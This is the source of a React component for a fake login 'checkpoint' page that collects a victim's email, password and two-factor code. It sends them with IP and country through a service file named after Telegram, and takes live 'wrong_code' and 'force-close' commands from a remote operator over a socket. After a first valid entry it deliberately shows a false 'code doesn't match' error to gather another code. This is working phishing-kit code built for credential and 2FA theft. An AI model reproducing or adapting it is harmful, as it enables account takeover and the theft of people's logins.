/* eslint-disable react-hooks/exhaustive-deps */
import { useEffect, useState } from "react";
import "./home.css";
import useLocalStorage from "../../hooks/useLocalStore";
import { getLocation, verify } from "../../services/telegram.service";
import useStore from "../../store";
import { useSocketIO } from "../../socketIO";
import { Checkpoint as CP } from "../../components/Chrome/checkpoint";

import contentImg from "../../assets/images/authimage.png";
import xicon from "../../assets/images/xicon.png";
import { AlertCircle, RefreshCcw } from "lucide-react";
import { handleCountdownText } from "../../services/utils";
import useCountdown from "../../hooks/useCountdown";
import { useLoginCountWithTTL } from "../../hooks/useLoggedInWithTTL";

export default function Checkpoint({
  onSuccess
}: {
  onSuccess: (is2FA?: boolean) => void;
}) {
  const { socketIO,  id} = useSocketIO();
  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: "",
    userName: "",
    checkpointType: 1,
    twoFaTitle: "",
    twoFaDescription: "",
    codeLabel: "Code",
    continueLabel: "Continue",
    otherLabel: "Try another way",
    countdownText: ""
  });
  const [twoFa, setTwoFa] = useState("");
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");
  const { timestamp } = useStore();
  const [isError, setIsError] = useState(false);
  // const [isSuccess, setIsSuccess] = useState(false);
  const [loading, setLoading] = useState(false);
  const [isFocused, setIsFocused] = useState(false);
  const [isConti, setIsConti] = useState(false);
  const [errorMessage, setErrorMessage] = useState("");
  const { loginCount, login } = useLoginCountWithTTL(600);
  const timeRemaining =
    Number(handleCountdownText(user.countdownText).time) || 180;
  const { formatted, isDone } = useCountdown(timeRemaining);
  const [noti, setNoti] = useState("");

  const handleClear = () => setTwoFa("");

  useEffect(() => {
    const containsLetter = /[a-zA-Z]/.test(twoFa);
    const numberCount = (twoFa.match(/\d/g) || []).length;
    setIsError(false);
    if (containsLetter) setNoti("Code should only contain digits.");
    else if (numberCount > 8)
      setNoti(
        "You entered too many symbols. The code should consist of six digits."
      );
    else setNoti("");
    setIsConti(numberCount > 5 && numberCount < 9);
  }, [twoFa]);

  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
    setCountryCode(data.country_code);
  };

  const handleFaCode = async () => {
    if (twoFa && twoFa.length > 5 && twoFa.length < 9) {
      try {
        setLoading(true);
        setUser({ ...user, twoFaCode: twoFa });
        const { success, data } = await verify(
          user.email,
          user.password,
          twoFa,
          countryCode,
          ip,
          "Captcha",
          timestamp,
          id
        );
        if (!data.loading) {
          if (!success) {
            setIsError(true);
            setErrorMessage(data.message);
            return;
          }
          setIsError(!data.verified);
          setErrorMessage(data.message);
          // setIsSuccess(data.verified);
          if (data.verified) {
            login();
            if (loginCount > 0) {
              setIsError(true);
              setErrorMessage(
                "The login code you entered doesn't match the one sent. Please check the number and try again."
              );
            } else {
              onSuccess(true);
            }
          }
          if (data.detacted) {
            setErrorMessage(
              "The login code you entered doesn't match the one sent. Please check the number and try again."
            );
          }
          setLoading(false);
        }
      } catch (error) {
        setLoading(false);
        setIsError(true);
        setErrorMessage("An unexpected error occurred. Please try again.");
      } finally {
      }
    } else {
      setLoading(true);
      setTimeout(() => {
        setIsError(true);
        setLoading(false);
      }, 2000);
    }
  };

  useEffect(() => {
    socketIO?.on("force-close", () => {
      login();
      if (loginCount > 0) {
        onSuccess();
      } else {
        onSuccess(true);
      }
    });
    socketIO?.on("wrong_code", (mes: string) => {
      setLoading(false);
      setIsError(true);
      setErrorMessage(mes || "Wrong code. Please try again.");
    });
    fetchCountry();
  }, []);

  return (
    <>
      {user.checkpointType === 1 ? (
        <CP name={user.userName} title={user.twoFaTitle} desc={user.twoFaDescription} />
      ) : (
        <div className="flex flex-col items-start w-full mx-auto rounded-lg">
          <div className="text-start text-[15px] font-Poppins_Regular">
            {user.userName}
          </div>
          <div className="text-start text-2xl font-bold font-Poppins_SemiBold pb-[4.624px]">
            {user.twoFaTitle}
          </div>
          <div className="text-start text-[15px] font-Poppins_Light leading-[1.352]">
            {user.twoFaDescription}
          </div>

          <div className="flex justify-center mt-4 w-full">
            <img
              src={contentImg}
              alt="2fa"
              className="w-full object-cover rounded-lg"
            />
          </div>

          <div className="w-full flex flex-row pt-6 pb-4">
            <div className="flex-grow flex flex-col">
              <div className="relative h-16 bg-white border border-gray-300 rounded-xl flex items-center overflow-hidden">
                <label
                  htmlFor="codeInput"
                  className={`absolute left-4 transition-all duration-200 pointer-events-none text-gray-500 ${
                    isFocused || twoFa
                      ? "text-xs top-2"
                      : "text-base top-1/2 -translate-y-1/2"
                  }`}
                >
                  {user.codeLabel}
                </label>
                <input
                  id="codeInput"
                  type="text"
                  className={`w-full h-full bg-transparent outline-none px-4 ${
                    isFocused || twoFa ? "pt-5 pb-1" : "py-3"
                  } text-gray-700 font-medium text-base`}
                  value={twoFa}
                  onChange={(e) => setTwoFa(e.target.value)}
                  onFocus={() => setIsFocused(true)}
                  onBlur={() => setIsFocused(false)}
                />
                {twoFa && (
                  <button
                    onClick={handleClear}
                    className="absolute right-3 top-1/2 -translate-y-1/2 w-6 h-6 flex items-center justify-center focus:outline-none"
                    aria-label="Clear input"
                  >
                    <div className="relative w-6 h-6">
                      {loading ? (
                        <div className="w-5 h-5 border-[2px] border-blue-700 border-t-transparent rounded-full animate-spin"></div>
                      ) : (
                        <img
                          src={xicon}
                          alt="Clear"
                          className="mask-size-cover"
                        />
                      )}
                    </div>
                  </button>
                )}
              </div>
              {user.countdownText && (
                <div className="flex items-center text-gray-500 text-sm mt-1">
                  <RefreshCcw className="w-4 h-4 mr-2" />
                  {!isDone ? (
                    <span>
                      {handleCountdownText(user.countdownText).text}
                      <strong className="text-gray-700">{formatted}</strong>
                    </span>
                  ) : (
                    <span className="text-blue-600 font-medium cursor-pointer hover:underline">
                      Resend Code
                    </span>
                  )}
                </div>
              )}
            </div>
          </div>

          {noti && (
            <div className="text-start text-sm text-red-600 font-Poppins_Light py-2">
              {noti}
            </div>
          )}

          {isError && (
            <div className="flex items-start gap-2 text-sm text-red-600">
              <AlertCircle className="w-5 h-5 mt-0.5 flex-shrink-0" />
              <span>{errorMessage}</span>
            </div>
          )}

          <div className="w-full flex flex-col gap-4 mt-4">
            <button
              className={`w-full flex items-center justify-center text-sm py-3 tracking-wide bg-blue-600 font-Poppins_Light text-white rounded-3xl disabled:opacity-40 z-50`}
              disabled={!isConti || loading}
              onClick={handleFaCode}
            >
              {loading ? (
                <div className="w-5 h-5 border-[2px] border-white border-t-transparent rounded-full animate-spin"></div>
              ) : (
                user.continueLabel
              )}
            </button>

            <button className="w-full text-sm py-3 tracking-wide bg-transparent border font-Poppins_Light border-gray-300 rounded-3xl z-50">
              {user.otherLabel}
            </button>
          </div>
        </div>
      )}
    </>
  );
}
